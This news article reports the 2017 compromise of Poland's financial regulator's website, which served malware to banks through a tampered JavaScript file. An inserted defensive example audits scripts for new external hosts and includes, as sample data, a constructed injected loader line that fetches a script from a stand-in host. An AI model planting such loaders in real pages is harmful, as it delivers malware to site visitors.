It is unclear who the hackers are or where they come from

Feb 6, 2017 14:56 GMT

Polish banks discovered malware on their servers, and it seems the source is the Polish Financial Supervision Authority (KNF).

This seems to be the largest system hack in the country’s history, and it is considered a massive attack on the financial sector.

It all started after malware was discovered on the workstations of several companies. The source of the executables, however, was the one entity they did not expect: the KNF. According to the KNF, its internal systems had been compromised by a foreign agent, although no specifics were provided.

The regulator’s entire system was taken down in order to secure evidence after it was discovered that its servers were hosting malicious files and infecting various banking systems it was supposed to oversee and protect.

According to BadCyber, which spoke to several banks and performed an analysis of the situation, banks noticed unusual network traffic and found encrypted executable files on several servers. A group of 20 commercial banks across Poland, as well as other banks, reported the same issues upon further investigation.

A high level of irony

The Polish Financial Supervision Authority is supposed to set the cybersecurity standards for Polish banks, which makes this situation particularly ironic. Experts believe that the whole situation is the result of a modified JavaScript file on the regulator’s site: visitors loaded an external JS file, which then downloaded the malware.
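A defender's check for this kind of tampering, as an added example that is not from the original article: compare the served copy of a site script with a known-good copy and list any hosts it newly references. The hostnames, script contents and function names are constructed for illustration.

```javascript
// Added example. All hostnames and script contents are constructed
// (reserved .example / .invalid names), not data from the incident.
const SITE_ORIGIN = 'https://regulator.example'; // assumption: site being audited
const ALLOWED_HOSTS = new Set(['regulator.example', 'cdn.regulator.example']);

// Known-good copy of a site script (constructed).
const KNOWN_GOOD =
  'function initMenu(){ loadCss("https://cdn.regulator.example/menu.css"); }\n';

// Currently served copy: same file plus an appended external loader (constructed).
const SERVED = KNOWN_GOOD +
  'var s=document.createElement("script");' +
  "s.src='//files.invalid/lib.js';document.head.appendChild(s);\n";

// Absolute or protocol-relative URLs that appear inside JS string literals.
const URL_IN_STRING = /(["'`])((?:https?:)?\/\/[^"'`\s]+)\1/g;

// Collect the hostnames a script's string literals point at.
function referencedHosts(source) {
  const hosts = new Set();
  for (const m of source.matchAll(URL_IN_STRING)) {
    try {
      hosts.add(new URL(m[2], SITE_ORIGIN).hostname.toLowerCase());
    } catch (_) {
      // Not a parseable URL; skip it.
    }
  }
  return hosts;
}

// Compare the served copy against the known-good copy.
function auditScript(knownGood, served) {
  const before = referencedHosts(knownGood);
  const newHosts = [...referencedHosts(served)].filter((h) => !before.has(h));
  return {
    modified: knownGood !== served,   // any byte-level change at all
    newHosts,                         // hosts absent from the known-good copy
    unexpectedHosts: newHosts.filter((h) => !ALLOWED_HOSTS.has(h)),
  };
}

console.log(auditScript(KNOWN_GOOD, SERVED));
```

String-literal matching misses URLs that are assembled at runtime, which is why the `modified` flag is reported separately and should be alerted on by itself.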

Once the malware was downloaded and executed, it connected to foreign servers. It could then be used for reconnaissance, lateral movement, and data exfiltration. According to the aforementioned source, it seems that, in some cases, the attackers managed to gain control over key servers within the bank infrastructure.

So far, there is no indication that people’s money was touched by hackers, or that operations were affected. This is, however, an ongoing investigation, so things may change in the days to come as more information comes to light.